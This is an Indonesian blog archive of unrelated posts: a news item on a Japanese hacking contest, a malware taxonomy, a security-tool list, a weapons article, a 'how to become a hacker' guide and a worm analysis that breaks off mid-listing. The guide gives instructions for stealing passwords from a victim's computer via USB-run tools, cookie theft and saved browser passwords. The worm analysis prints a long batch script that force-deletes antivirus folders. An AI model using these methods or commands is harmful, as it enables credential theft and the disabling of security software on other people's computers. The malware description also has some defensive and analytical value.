cepat

cepat,mudah, dan praktis untuk mendownload program

Kamis, 31 Maret 2011

Olimpiade Hacker: Usaha Pemerintah Jepang Mendidik Hacker

Kementrian Ekonomi, Perdagangan dan Industri Jepang (METI) akan mengadakan olimpiade "Computer Security Champhionship" (security kou-shi-en) yang pertama di jepang.
Menurut METI, plimpiade ini bertujuan untuk mencari dan mendidik bibit muda yang memiliki teknik dan pengetahuan hacking komputer. Lomba ini akan diadakan dengan mekanisme dimana peserta olimpiade ini akan diseleksi dari SMU dan sekolah kejuruan di seluruh jepang, yang jumlahnya sebanyak 20 tim.
Masing-masing tim akan dicoba ketangguhannya untuk memasuki server tim lawan. Pemenang lomba ini akan diberi hadiah berupa kesempatan belajar di luar negeri ke Amerika, seperti ke Universitas Carnegie Mellon atau ke Dartmouth College Amerika. Menurut METI, perlombaan serupa juga diadakan oleh banyak negara lain, namun baru kali ini diadakan oleh pemerintah sebuah negara.
Menurut data penelitian, impor software Jepang pada tahun 2000 sebanyak 920 milyar yen, sedangkan ekspor software jepang hanya sebesar 9 milyar yen. Oleh karena itu kedudukan olimpiade ini penting untuk mengumpulkan bibit unggul di bidang komputer, mendidik mereka ke luar negeri, dan akhirnya akan memperkuat daya saing Jepang di bidang komputer.
Olimpiade ini akan diadakan di sebuah hotel di Tokyo pada bulan agustus tahun 2003, dan pendaftaran akan dimulai dari bulan juni 2003. Satu tim terdiri dari 3 orang, semua server pada awalnya mempunyai lubang sekuriti (security hole). Masing-masing team harus berusaha menutup lubang sekuriti dan memperkuat server mereka. Pada saat yang sama mereka juga harus berusaha mencari lubang sekuriti lawan, masuk dan mengambil alih kontrol server lawan.
Saat ini pemerintah Jepang sangat aktif dalam usaha memajukan pendidikan ilmu komputer di jepang. Walaupun jepang sudah termasuk negara maju, namun untuk bidang komputerisasi, jepang masih ketinggalan dibandingkan dengan negara maju lainnya seperti Amerika maupun Eropa. Usaha lain pemerintah jepang adalah dengan mengadakan ujian negara untuk ilmu komputer. Ujian ini mempunyai banyak jenis dan level, antara lain:
Fundamental Software Engineer, Database Technical Engineer, Network Technical Engineer, Security , Software Developer dan lain sebagainya.
Pemilik kualifikasi (tanda lulus ujian), dihargai oleh perusahaan-perusahaan di jepang, dan salah satu modal bagi mahasiswa jepang ketika mencari pekerjaan. Beberapa perusahaan software jepang juga memberikan insentif, atau menaikkan gaji pokok untuk pegawai yang lulus ujian ini.
Selain ujian negara, banyak juga ujian lainnya yang diadakan oleh organisasi-organisasi maupun enterprise (Microsoft, Oracle), baik tingkat lokal maupun internasional. Salah satu ujian yang cukup terkenal ialah FE (Fundamental Software Engineering) atau dalam bahasa Jepangnya disebut Kihon-Jouhou-Gijyutsusha. Ujian ini di beberapa perusahaan akhir-akhir ini menjadi "TOEFL nya ilmu komputer", bahkan ada perusahaan software yang mewajibkan pegawainya lulus ujian ini.

Definisi

Kode jahat/perusak (malicious codes atau disingkat malcodes) didefinisikan sebagai semua macam program, makro atau script yang dapat diesekusi dan dibuat dengan tujuan untuk merusak sistem komputer. Oleh karena itu bug yang dibuat secara tidak sengaja oleh programer, tidak termasuk dalam kategori ini. Tetapi untuk bug yang benar-benar mengganggu, banyak orang mengkategorikannya sebagai malcode.
Dahulu digunakan istilah "Malware (= Malicious Software)" ditujukan untuk malcode. Tetapi istilah ini terlalu lemah dan sempit, sehingga e-mail palsu/bohong yang notabene bukan software tidak dapat dimasukkan dalam golongan ini. Oleh karena itu digunakan istilah malcode, bukan malware.

Klasifikasi

Kode perusak dapat digolongkan dalam 3 macam golongan: virus, worm dan Trojan Horses, serta beberapa program yang memiliki bug.
Virus
Virus memiliki kemampuan jahat untuk mereproduksi diri mereka sendiri dan terdiri dari kumpulan kode yang dapat memodifikasi target kode yang sedang berjalan, atau dapat pula memodifikasi struktur internal target kode, sehingga target kode sebelum berjalan dipaksa menjalankan virus.
Virus sering menampilkan pesan yang tidak disukai, merusak tampilan display, menghapus memory C-MOS, merusak informasi dalam hard disk dll. Efek yang ditimbulkan virus mengalami perkembangan yang cukup serius akhir-akhir ini.
Contoh virus: Brain, Ohe half, Die hard, XM/Laroux, Win95/CIH
Virus masih dapat dibagi lagi dalam beberapa kategori:
  1. Boot Virus: Jika komputer dinyalakan, sebuah inisial program di boot sector akan dijalankan. Virus yang berada di boot sector disebut boot virus.
  2. File Virus: File virus adalah virus yang menginfeksi executable program. Dilaporkan bahwa hampir 80% virus adalah file virus.
  3. Multipartite Virus: Virus yang menginfeksi baik boot sector dan file.
  4. Macro Virus: Belakangan diketemukan. Targetnya bukan executable program, tetapi file dokument seperti Microsoft Excel atau Word. Ia akan memulai menginfeksi bila program aplikasi membaca dokumen yang berisi macro.
Worm
Worm ditujukan kepada program yang mengkopi dirinya sendiri ke HANYA memory komputer. Perbedaan mendasar dari worm dan virus adalah, apakah menginfeksi target code atau tidak. Virus menginfeksi target code, tetapi worm tidak. Worm hanya ngendon di memory.
Worm pada awalnya diketemukan di large computer (1970-an), dan akhir- akhir ini saja diketemukan di komputer kecil seperti PC. Terutama sejak 1999, dimana work banyak beredar melalui media email.
Contoh worm: I-Worm/Happy99(Ska), I-Worm/ExploreZIP, I-Worm/PrettyPark, I-Worm/MyPics
Trojan Horse
Trojan Horse diproduksi dengan tujuan jahat. Berbeda dengan virus, Trojan Horse tidak dapat memproduksi diri sendiri. Pada umumnya, mereka dibawa oleh utility program lainnya. Utility program tersebut mengandung dirinya, atau Trojan Horse itu sendiri ber"lagak" sebagai utility program.
Contoh Trojan Horse: Win-Trojan/Back Orifice, Win-Trojan/SubSeven, Win-Trojan/Ecokys(Korean)
Trojan Horse masih dapat dibagi lagi menjadi:
  1. DOS Trojan Horse: Trojan Horse yang berjalan di DOS. Ia mengurangi kecepatan komputer atau menghapus file-file pada hari atau situasi tertentu.
  2. Windows Trojan Horse: Dijalankan di system Microsoft Windows. Jumlah Windows Trojan Horse meningkat sejak 1998 dan digunakan sebagai program untuk hacking dengan tujuan jahat yang dapat mengkoleksi informasi dari komputer yang tersambung internet.
Nessus
The "Nessus" Proyek bertujuan untuk memberikan kepada masyarakat internet gratis, kuat, up-to-date dan mudah digunakan pemindai keamanan remote untuk Linux, BSD, Solaris, dan rasa lainnya Unix.
Ethereal
Ethereal adalah sebuah protokol network analyzer gratis untuk Unix dan Windows. Ethereal memiliki beberapa fitur canggih, termasuk bahasa tampilan kaya filter dan kemampuan untuk melihat aliran direkonstruksi dari sebuah sesi TCP.
Snort
Snort adalah sebuah jaringan sistem deteksi intrusi sumber terbuka, mampu melakukan analisis real-time lalu lintas dan paket logging pada jaringan IP.
Netcat
Netcat telah dijuluki jaringan pisau tentara swiss. Ini adalah utilitas Unix sederhana yang membaca dan menulis data di seluruh koneksi jaringan, menggunakan protokol TCP atau UDP
TCPdump
TCPdump adalah jaringan yang paling banyak digunakan sniffer / analyzer untuk UNIX. TCPTrace analisis format file dump yang dihasilkan oleh TCPdump dan aplikasi lain.
Hping
Hping adalah perintah-baris berorientasi TCP / IP assembler paket / analyzer, jenis seperti program "ping" (tapi dengan banyak ekstensi).
DNSiff
DNSiff adalah kumpulan alat untuk audit jaringan dan pengujian penetrasi. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, dan webspy pasif memonitor jaringan untuk data yang menarik (password, e-mail, file, dll).
GFI LANguard
LANguard GFI Network Security Scanner (NSS) secara otomatis memindai seluruh jaringan Anda, IP dengan IP, dan memainkan advokat iblis mengingatkan Anda untuk kerentanan keamanan.
Ettercap
> Ettercap adalah multiguna sniffer / interceptor / logger untuk LAN diaktifkan. Mendukung diseksi aktif dan pasif banyak protokol (bahkan ciphered mereka) dan mencakup banyak fitur untuk jaringan dan analisis host.
Nikto
Nikto adalah Open Source (GPL) web server scanner yang melakukan tes komprehensif terhadap server web untuk beberapa item, termasuk lebih dari 2500 file yang berpotensi berbahaya / CGIS, versi di lebih dari 375 server, dan masalah versi tertentu pada lebih dari 230 server.
John the Ripper
John the Ripper merupakan password cracker yang cepat, saat ini tersedia untuk banyak rasa Unix.
OpenSSH
OpenSSH adalah versi GRATIS dari protokol SSH alat konektivitas jaringan, yang mengenkripsi semua lalu lintas (termasuk password) untuk secara efektif menghilangkan pembajakan koneksi, percakapan, dan lain-tingkat serangan jaringan.
Tripwire
Tripwire adalah alat yang dapat digunakan untuk data dan program jaminan integritas.
kismet
Kismet adalah sebuah Sniffer jaringan nirkabel 802.11 - ini berbeda dari sniffer jaringan normal (seperti Ethereal atau tcpdump) karena memisahkan dan mengidentifikasi jaringan nirkabel berbeda di daerah tersebut.
Netfilter
Netfilter dan iptables adalah kerangka di dalam kernel Linux 2.4.x yang memungkinkan packet filtering, network address translation (NAT) dan packetmangling lainnya.
IP Filter
IP Filter adalah paket perangkat lunak yang dapat digunakan untuk menyediakan network address translation (NAT) atau layanan firewall.
pf
OpenBSD Packet Filter
fport
fport identifys semua terbuka TCP / IP dan port UDP dan peta mereka ke aplikasi memiliki.
SAINT
SAINT jaringan pemindai kerentanan penilaian mendeteksi kerentanan dalam keamanan jaringan Anda sebelum mereka dapat dieksploitasi.
OpenPGP
OpenPGP adalah protokol non-eksklusif untuk mengenkripsi email dengan menggunakan kriptografi kunci publik. Hal ini didasarkan pada PGP sebagai awalnya dikembangkan oleh Phil Zimmermann.

binary

Binary Code terdiri dari dua nilai, yaitu “0” dan “1” dimana kedua nilai tersebut membangun nilai yang kita ketahui; sebagai contoh “HeXa”, “Desima”, “Octal”, dll. Biner terdiri dari beberapa Bit, biasanya yang digunakan ialah kelipatan 4.
0000 0000 0000 0000 0000 0000 ...

Misalkan Biner yang memiliki jumlah 8 bit dimana terdiri dari 0 s/d 7 bit yang berjumlah 8. Kita akan mendapatkan nilai desimal dari deretan 8 bit Biner (0 s/d 7), lalu dengan perhitungan masing-masing bit menggunakan rumus 2i , dimana i=0...7. Desimal yang akan didapatkan dari 8 bit binary code ialah rentang dari 0 s/d 255 dengan nilai desimal yang akan didapatkan dari jumlah perhitungan bit biner yang bernilai.

Rabu, 30 Maret 2011

cara menjadi hacker

Banyak cara menjadi seorang hacker, dari cara yang paling mudah hingga cara yang paling sulit. Beberapa orang memakai software untuk melakukan hack.Cara yang dipakai hacker untuk melakukan hack diantaranya pirates facebook,keylogger,mail passview,messenpass,social engineering,web spoofing,menghadang email,password cracking,session hijacking,menjadi proxy server,memanfaatkan kelalaian user dalam menggunakan fitur browser, dan googling.
Pirates facebook
merupakan software yang bekerja dengan menggunakan nomor id facebook serta IP address facebook. Cara ini memang langsung menemukan kita pada email dan password korban namun yang mempersulit kita dalam pemakaian software ini adalah mengetikan IP Address. IP Address selalu berubah dalam waktu yang sangat singkat,dalam hitungan detik. Untuk menggunakan software ini diperlukan kerja keras,semangat dan kecepatan.
Mail PassView dan MessenPass
berfungsi untuk mengetahui password yahoo messenger. Penggunaan software ini sangat simple dengan mendownload software ini di website www.nirsoft.net kemudian menyimpan file tersebut di flashdisk dan memasukkannya pada computer korban. Software tersebut bekerja dalam hitungan 3 detik. Jadi, anda dapat melakukannya dengan mencolokkan flashdisk pada computer korban kemudian klik software tersebut. Dalam hitungan detik software bekerja mengcopy semua password yang pernah diketik pada computer korban.
Social Engineering
adalah nama suatu teknik pengumpulan informasi dengan memanfaatkan celah psikologi korban. Atau mungkin boleh juga dikatakan sebagai “penipuan” Sosial Engineering membutuhkan kesabaran dan kehati-hatian agar sang korban tidak curiga. Kita dituntut untuk kreatif dan mampu berpikiran seperti sang korban. Social Engineering merupakan seni “memaksa” orang lain untuk melakukan sesuatu sesuai dengan harapan atau keinginan anda. Tentu saja “pemaksaan” yang dilakukan tidak secara terang-terangan atau diluar tingkah laku normal yang biasa dilakukan sang korban. Manusia cenderung untuk percaya atau mudah terpengaruh terhadap orang yang memiliki nama besar, pernah (atau sedang berusaha) memberikan pertolongan, dan memiliki kata-kata atau penampilan yang meyakinkan. Hal ini sering dimanfaatkan pelaku social engineering untuk menjerat korbannya. Seringkali sang pelaku membuat suatu kondisi agar kita memiliki semacam ketergantungan kepadanya.Ya,tanpa kita sadari dia mengkondisikan kita dalam suatu masalah dan membuat ( seolah – olah hanya ) dialah yang bisa mengatasi masalah itu. Dengan demikian,tentu kita akan cenderung untuk menuruti apa yang dia instruksikan tanpa merasa curiga. Sosial Engineering adakalanya menjadi ancaman serius. Memang sepertinya tidak ada kaitan dengan teknologi, namun sosial engineering tetap layak diwaspadai karena bisa berakibat fatal bagi sistem anda. Why?? Karena bagaimanapun juga suatu komputer tetap saja tidak bisa lepas dari manusia. Ya, tidak ada satu sistem komputerpun di muka bumi ini yang bisa lepas dari campur tangan manusia. Sehebat apapun pertahanan anda, jika anda sudah dikuasai oleh attacker melalui social engineering, maka bisa jadi anda sendirilah yang membukakan jalan masuk bagi sang attacker.
KeyLogger
adalah software yang dapat merekam aktivitas user. Hasil rekaman itu biasa disimpan berupa teks atau gambar. KeyLogger bekerja berdasarkan ketukan keyboard user. Aplikasi ini mampu mengenali form-form sensitif seperti formpassword misalnya. Ada cara aman untuk menghindari keyloger:
  1. Gunakan password dengan karakter special seperti !@#$%^&*(){}[]. Kebanyakankeyloger akan mengabaikan karakter ini sehingga sang pelaku (pemasangkeyloger) tidak akan mendapatkan password anda yang sebenarnya.
  2. Persiapkan password dari rumah, simpan dalam bentuk teks. Saat inginmemasukkan password, tingal copy-paste ajah. Keyloger akan membaca passwordanda berdasarkan ketukan keyboard. Namun cara ini agak beresiko. Mengapa? karena saat anda melakukan copy, data anda akan tersimpan di clipboard. Saat ini banyak dijumpai software-software gratis yang bisa menampilkan data dalam clipboard.
Masih ingat kasus pecurian Account sejumlah nasabah Bank BCA? Ya, itulah salah satu contoh nyata dari Web spoofing. Inti dari tehnik ini ialah dengan memanfaatkan kesalahan user saat mengetikkan alamat situs pada address bar. Pada dasarnya, Web Spoofing adalah usaha untuk menipu korban agar mengira dia sedang mengakses suatu situs tertentu, padahal bukan. Pada kasus bank BCA, pelaku membuat situs yang sangat mirip dan identik dengan situs aslinya sehingga sang korban yang terkecoh tidak akan merasa ragu mengisikan informasi sensitif seperti user name dan Passwordnya. Padahal, karena situs tersebut adalah situs tipuan, maka semua informasi berharga tadi terekam oleh webserver palsu, yaitu milik sang pelaku.
Menghadang email? Ya, dan sangat mudah untuk melakukan hal ini. Salah satu cara adalah dengan menggunakan mailsnarf yang terdapat pada utility dsniff. Cara kerja Mailsnarf adalah dengan menghadang paket data yang lewat di Internet dan menyusunnya menjadi suatu email utuh. Dsniff dan mailsnift merupakan software bekerja atas dasar WinPcap (setara dengan libcap pada Linux) yaitu suatu library yang menangkap paket-paket data. Paket-paket yang ditangkap ini akan disimpan dalam bentuk file oleh Windump, sedangkan Dsniff dan MailSnarf bertindak lebih jauh lagi yaitu menganalisa paket-paket data ini dan menampilkan password (dsniff) atau isi email (mailsnarf).
“Hacking while sleeping.” itulah ungkapan yang biasa dipakai oleh orang-orang yang melakukan password cracking. Mengapa? Karena pada umumnya dibuthkan waktu yang lama untuk melakukan pasword cracking. Bisa berjam-jam, bahkan berhari – hari! Semua itu tergantung dari target, apakah sang target menggunakan password yang umum, password memiliki panjang karakter yang tidak biasa, atau password memiliki kombinasi dengan karakter-karakter special. Salah satu software yang biasa digunakan untuk melakukan hal ini ialah dengan mengunakan Brutus, salah satu jenis software remote password cracker yang cukup terkenal. Brutus bekerja dengan teknik dictionary attack atau bruce-force attack terhadap port-port http, POP3,ftp, telnet, dan NetBIOS. Dictionary Attack bekerja dengan mencobakan kata-kata yang ada dalam kamus password. Sedangkan brute – force attack bekerja dengan mencobakan semua kombinasi huruf, angka, atau karakter. Brute Force Atack bekerja sangat lambat dan membutuhkan waktu yang lama tergantung dari jenis spesifikasi komputernya dan panjang karakter passwordnya. Saat ini telah banyak situs yang menutup akses terhadap akses terhadap usaha login yang secara terus-menerus tidak berhasil. Jika anda ingin melakukan password Cracking, silahkan pilih – pilih sendiri aplikasinya di halaman Member – spyrozone.net.
Session hijacking dewasa ini semakin marak dikalangan para attacker. Session Hijacking biasa dilakukan dengan melakukan peniruan cookies. Jadi pada intinya, kita harus bisa meniru cookies sang korban untuk mendapatkan sesi loginnya. Lalu bagaimana cara mendapatkan cookies sang korban?
1. Dengan analisa Cookies. Cara ini relatif sulit dilakukan.
2. Mencuri Cokies. Misalnya Sang Attacker ingin mendapatkan account si A. Sang Attacker bias dengan mudah membuat semacam script Java Script yang disisipkan dalam email untuk dikirim ke korban.Saat korban membuka email itu, tanpa sadar cookiesnya akan dicuri dan direkam ke suatu webserver dengan memanfaatkan suatu script PHP. Belakangan ini yang paling sering menjadi incaran adalah account Friendster. Ada yang menyisipkan suatu scipt lewat testimonial, ada yang menyisipkannya di profilnya sendiri untuk mencuri cookies sang korban dan lain sebagainya. Saya memiliki tips untuk ini:
1. Jangan menggunakan browser InternetExplorer saat ingin membuka profil orang lain. Catat alamat profil yang ingi anda lihat,logout terlebih dahulu dari account anda dan bersihkan semua cookies, baru kemudian bukalah profil Friendster tujuan.
2. Ketika menerima testimonial, periksa terlebih dahulu source codenya. Apakah disana terdapat script asing atau kata-kata yang identik dengan pembajakan seperti : “HACKED”, “DEFACED”, “OWNED”.. dll.. Jika ragu-ragu……. Reject ajah..
3. Waspada ketika tanpa suatu alasan yang jelas tiba-tiba anda logout dengan sendirinya dari account anda. Saat anda diminta memasukkan username dan password, lihat dulu addressbar anda! apakan anda sedang berada di situs yang semestinya atau tidak. Periksa source code halaman tersebut.Lihat pada form action, kemana informasi anda nantinya akan dikirim. Sebenarnya session hijacking bisa dicegah jika saja sang penyedia layanan memperhatikan hal-hal berikut:
a. Menetapkan session identifier yang unik
b. Menetapkan sistem identifier berpola acak
c. Session identifier yang independent
d. Session identifier yang bisa dipetakan dengan koneksi client side.
Kita bisa mengumpulkan informasi dengan menjadi proxy server bagi korban untuk dapat berselancar. Dengan menjadi proxy server, seluruh identitas sang peselancar bisa menjadi milik kita.
Memanfaatkan Kelalaian user dalam penggunaan fitur browser Setiap browser tentunya memiliki fitur yang ditujukan untuk kemudahan dan kenyamanan penggunanya dalam berselancar. Diantaranya ialah dengan adanya cache dan Password Manager. Di Internet tentunya banyak suatu website yang isinya tidak berubah dalam beberapa hari (Contohnya spyrozone.net nich.. hehehe Nah, untuk situs yang seperti ini cache menjadi hal yang sangat berguna. Cache akan menyimpan file-file hasil browsing sehinga nantinya jika anda berkunjung lagi ke situs tersebut browser tidakperlu lagi melakukan download untuk kedua kalinya dari server sehingga setiap halaman situs yang telah anda buka sebelumnya akan terbuka dengan lebih cepat. Semua itu biasanya diatur oleh header time to live. Lho, bagaimana dengan situs-situs penyedia berita yang selalu up to date? Untuk site yang seperti itu, time to live-nya akan di set=0 sehinga nantinya anda akan terus melakukan download setiap kali berkunjung. Cukup nyaman bukan? Ya, tapi ancaman mulai timbul. Cobalah kini anda jelajahi opsi-opsi yang berkaitan dengan cache pada browser anda. Tentu anda bias menemui bahwa ada fasilitas untuk menentukan berapa besarnya file temporary yang bisa disimpan di harddisk. Cari juga lokasi dimana file-file tersebut akan disimpan. Coba anda buka folder tersebut, anda akan menemui file-file html & file-file gambar dari site-site yang sudah anda kunjungi. Pada Browser IE, anda bias melihat lokasi file cache dengan menjelajahi menu Tools —> Internet options —> Settings Lalu apa yang bisa didapatkan?? toh cuma file-file “sampah”?? Hmm… sekarang coba anda copy semua file yang ada di sana ke suatu folder. Lalu bukalah salah-satu file htmlnya. Jika itu komputer publik,anda bisa mengetahui situs apa saja yang telah diakses oleh oleh orang sebelum anda. Hmm.. hanya dengan melihat file temporary anda bahkan bisa melihat password dan dll.Banyak saya temui situs yang menyimpan password dan menampilkannya pada url. Tentunya anda juga pasti sering membacanya di berbagai tutorial. Kebanyakan browser pada saat ini memiliki fasilitas untuk menyimpan password. Misalnya saat meggunakan Mozilla Firefox, anda pasti sering menerima kotak dialog konfirmasi yang menanyakan apakah anda ingin password anda disimpan atau tidak oleh PasswordManager.Kebanyakan user cenderung untuk memilih opsi YES, entah itu dengan penuh kesadaran atau memang mereka tidak tau ( baca: tidak mau tau) apa maksud dari kotak dialog itu. Orang lain yang kemudian mengunakan browser itu bisa dengan sangat mudah mendapatkan password korban dengan memasuki menu Tools —> Options —> Security –> Saved password. Contoh lain adalah fasilitas wand password yang dimiliki oleh browser Opera. Saat anda memasukkan user name dan password pada suatu form dan menekan tombol submit, opera secara default akan meminta konfirmasi kepada anda apakah anda ingin browser menyimpan id dan password anda atau tidak. Lagi dan lagi… kebanyakan netter ceroboh, mereka cenderung untuk memilih opsi “YES”. Lalu?? Orang lain yang kemudian menggunakan browser itu bisa melihat situs apa saja yang telah diakses oleh user, arahkan browser ke situs tersebut, letakkan cursor pada form isian user name, tekan [ALT]+[ENTER] dan BOOOMM!!!! Kenapa?? Jangan kaget dulu!! Hehehe.. form login akan otomatis terisi dengan user name korban lengkap dengan passwordnya.
Google.com.
Banyak sudah situs yang runtuh, password dan nomor – nomor kartu kredit yang dicuri akibat dari ulah orang yang menyalahgunaan kesaktiannya Dahulu, hal ini mudah dilakukan.Hanya dengan mengetikkan kata kunci tertentu yang berkaitan dengan user name dan password, anda bisa memanen ratusan password user melalui google. Tapi sekarang tampaknya anda harus gigit jari jika menggunakan cara diatas Jangan sedih dulu karena Google baru saja menelurkan produk barunya, yaitu Google Code Search. Ancaman baru mulai timbul, “si pintar” ini kini dapat meng-crawl hingga kepada archive file yang berada di public directory web server. Hati-hati yang punya kebiasaan untuk menyimpan informasi penting di dalamnya (password, dan info berharga lainnya) Sebaiknya mulai sekarang kebiasaan itu dihilangkan. Selalu proteksi folder-folder yang sensitif agar situs anda bisa hidup lebih lama. Kalo nggak… yach.. tunggu ajah ada orang yang memanfaatkan produk baru google ini untuk mengeruk informasi sensitive dari web server anda. dan jika itu sudah terjadi… maka bersiaplah.. “taman bermain” anda akan diambil alih olehnya..

senjata mematikan

Lupakan soal senjata nuklir, biologi dan kimia karena saat ini di seluruh dunia, terutama wilayah-wilayah bekas konflik di Afrika, timur tengah, indocina, balkan dan sebagainya jutaan anak-anak serta orang-orang tidak berdosa terbunuh oleh senjata-senjata yang di kalangan militer justru disebut sebagai senjata konvensional.

Senjata-senjata seperti bom cluster, Bom fosfor, napalm, peluru DU (Depleted Uranium), ranjau darat sangat populer untuk digunakan di dalam pertempuran karena selain harganya terjangkau bahkan untuk militer negara miskin sekalipun, senjata ini juga memiliki efek merusak yang cukup hebat.

Akan tetapi dalam perkembangannya senjata-senjata ini justru menjadi bom waktu karena justru efeknya sangat terasa pada masa-masa pasca perang.

Beberapa senjata seperti bom cluster dan ranjau darat memang telah dilarang oleh PBB untuk diproduksi dan digunakan dalam peperangan, namun kepentingan bisnis negara-negara produsen seperti AS, Israel, Perancis, RRC, Russia dan sebagainya telah menutup mata hati para politikus dan ahli militer di banyak negara untuk tetap menggunakan dan memproduksi senjata-senjata tersebut.

Untuk pengetahuan kita semua berikut ini adalah beberapa detail senjata-senjata kontroversial tersebut.


1. Cluster Bomb

Bom cluster atau bom tandan atau bom curah adalah bom yang memiliki mekanisme unik dimana setelah diluncurkan dari pesawat tempur atau bomber, bom akan pecah menjadi ratusan bom kecil berupa kaleng.


Pada awalnya bom ini diciptakan untuk menghancurkan landasan pacu pangkalan udara, konvoi kendaraan lapis baja atau untuk membubarkan konsentrasi pasukan darat.

Diproduksi dengan berbagai nama seperti CBU/Cluster Bomb Units (Amerika Serikat), Belouga (Perancis), Excalibur (Amerika Serikat). Secara efektif bom ini digunakan dalam perang Iraq, Afganistan dan perang arab-israel.


2. Napalm Bomb

Banyak negara protes saat Indonesia menggunakan bom napalm dalam operasi Seroja di Timor-Timur tahun 70-an, tapi dalam sekala yang lebih besar AS menggunakan bom ini dalam konflik di Vietnam serta Israel dalam perang Yom Kippur, namun tidak banyak negara yang protes.


Secara teknis napalm adalah bom bakar yang berisi zat kimia berbentuk pasta tertentu yang akan terbakar begitu bom pecah di darat. Pasta yang cair akan menyebarkan nyala api ke berbagai arah dan bom ini sangat efektif untuk menghancurkan pasukan darat yang bersembuni di parit-parit atau hutan.


3. Peluru DU (Depleted Uranium)

Peluru depleted uranium adalah jenis peluru yang dikembangkan dari limbah Uranium hasil pelucutan bom nuklir. Secara harafiah depleted uranium berarti uranium yang dilemahkan radiasinya. Peluru ini sangat handal dan menjadi standar senjata meriam gatling GAU-8 Avenger yang dibawa pesawat A-10 serta canon bushmaster pada APC Bradley.


DU juga digunakan untuk membuat inti peluru anti material pada tank Abrams. Efektifitas senjata ini adalah mampu menembus bahan baja tank setebal apapun dan ini terbukti pada perang Iraq dimana ratusan tank Iraq menjadi korban senjata ini.

Yang menjadikan senjata ini kontroversial adalah kandungan uranium yang ternyata menurut penelitian masih memancarkan radiasi dalam tingkatan yang membahayakan manusia.

Ini tebukti pada kasus di bosnia saat beberapa tentara Italia menderita leukemia beberapa hari setelah menggunakan peluru tersebut. di Iraq, tank-tank yang hancur terkena peluru ini ternyata memancarkan radiasi yang membuat tank-tank rongsokan tersebut tidak aman untuk didekati.

berbagai virus and malware

Rose-Loren.E
Rose-Loren.E. Tidak selamanya dunia malware itu terkesan hitam dan jahat. Karena Rose-Loren dan salah satu variannya yang di bahas kali ini lebih mengesankan kepiluan serta rasa kesedihan yang dirasakan oleh pembuatnya. Jika bunga mawar umumnya mencirikan perasaan cinta, Rose-Loren membuat bunga mawar sebagai tanda kedatangannya.

A. Info Malware
Nama: Rose-Loren.E
Asal: Indonesia
Ukuran File: 91.7 KB (93,961 bytes)
Packer : Unknown
Pemrograman : Visual Basic
Icon : Folder Windows
Tipe : Worm
B. Tentang Malware
Sepertinya ini adalah hasil dari modifikasi dari source terdahulu karena sudah cukup lama kami mendapatkan variant dari Rose-Loren. eSetelah di unpack, worm ini berukuran 216 KB (221,696 bytes). Saat worm ini aktif di memory, komputer akan terasa lambat karena proses Rose-Loren.E menyita resource yang cukup besar.
C. Companion/File yang dibuat
Saat aktif, worm akan mencari setiap drive yang ditemukan dan membuat file/folder antara lain sebagai berikut:

  • Membuat file yang merupakan file induk/host dari worm, yaitu
    C:\WINDOWS\system32\[5 buah bilangan acak]\lsass.exe dan
    C:\WINDOWS\system32\[5 buah bilangan acak]\svchost.exe
  • Membuat juga file dengan nama EpIoler dan autoexec.bat di folder yang sama seperti di atas, dan isinya adalah:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    del /f /q /s  C:\ESET\*.* >nul
    del /f /q /s  C:\antivi~1\*.* >nul
    del /f /q /s  C:\antivi~2\*.* >nul
    del /f /q /s  C:\antiviru\*.* >nul
    del /f /q /s  C:\avg\*.* >nul
    del /f /q /s  C:\kasper~1\*.* >nul
    del /f /q /s  C:\kasper~2\*.* >nul
    del /f /q /s  C:\mcafee\*.* >nul
    del /f /q /s  C:\mcafee.com\agent\*.* >nul
    del /f /q /s  C:\mcafee.com\*.* >nul
    del /f /q /s  C:\mcafee.com\VSO\*.* >nul
    del /f /q /s  C:\mcafee~1\*.* >nul
    del /f /q /s  C:\msav\*.* >nul
    del /f /q /s  C:\norman\*.* >nul
    del /f /q /s  C:\norton~1\*.* >nul
    del /f /q /s  C:\norton~2\*.* >nul
    del /f /q /s  C:\pav\*.* >nul
    del /f /q /s  C:\pccill~1\*.* >nul
    del /f /q /s  C:\iolo\*.* >nul
    del /f /q /s  C:\progra~1\ESET\*.* >nul
    del /f /q /s  C:\progra~1\antivi~1\*.* >nul
    del /f /q /s  C:\progra~1\antivi~2\*.* >nul
    del /f /q /s  C:\progra~1\avg\*.* >nul
    del /f /q /s  C:\progra~1\kasper~1\*.* >nul
    del /f /q /s  C:\progra~1\kasper~2\*.* >nul
    del /f /q /s  C:\progra~1\mcafee\*.* >nul
    del /f /q /s  C:\progra~1\McAfee.com\agent\*.* >nul
    del /f /q /s  C:\progra~1\McAfee.com\\*.* >nul
    del /f /q /s  C:\progra~1\McAfee.com\VSO\*.* >nul
    del /f /q /s  C:\progra~1\mcafee~1\*.* >nul
    del /f /q /s  C:\progra~1\mindso~1\*.* >nul
    del /f /q /s  C:\progra~1\norman\*.* >nul
    del /f /q /s  C:\progra~1\norton~1\*.* >nul
    del /f /q /s  C:\progra~1\norton~2\*.* >nul
    del /f /q /s  C:\progra~1\pandas~1\*.* >nul
    del /f /q /s  C:\Progra~1\Alwils~1\*.* >nul
    del /f /q /s  C:\progra~1\iolo\*.* >nul
    del /f /q /s /a:h  C:\ESET\*.* >nul
    del /f /q /s /a:h  C:\antivi~1\*.* >nul
    del /f /q /s /a:h  C:\antivi~2\*.* >nul
    del /f /q /s /a:h  C:\antiviru\*.* >nul
    del /f /q /s /a:h  C:\avg\*.* >nul
    del /f /q /s /a:h  C:\kasper~1\*.* >nul
    del /f /q /s /a:h  C:\kasper~2\*.* >nul
    del /f /q /s /a:h  C:\mcafee\*.* >nul
    del /f /q /s /a:h  C:\mcafee.com\agent\*.* >nul
    del /f /q /s /a:h  C:\mcafee.com\VSO\*.* >nul
    del /f /q /s /a:h  C:\mcafee~1\*.* >nul
    del /f /q /s /a:h  C:\msav\*.* >nul
    del /f /q /s /a:h  C:\norman\*.* >nul
    del /f /q /s /a:h  C:\norton~1\*.* >nul
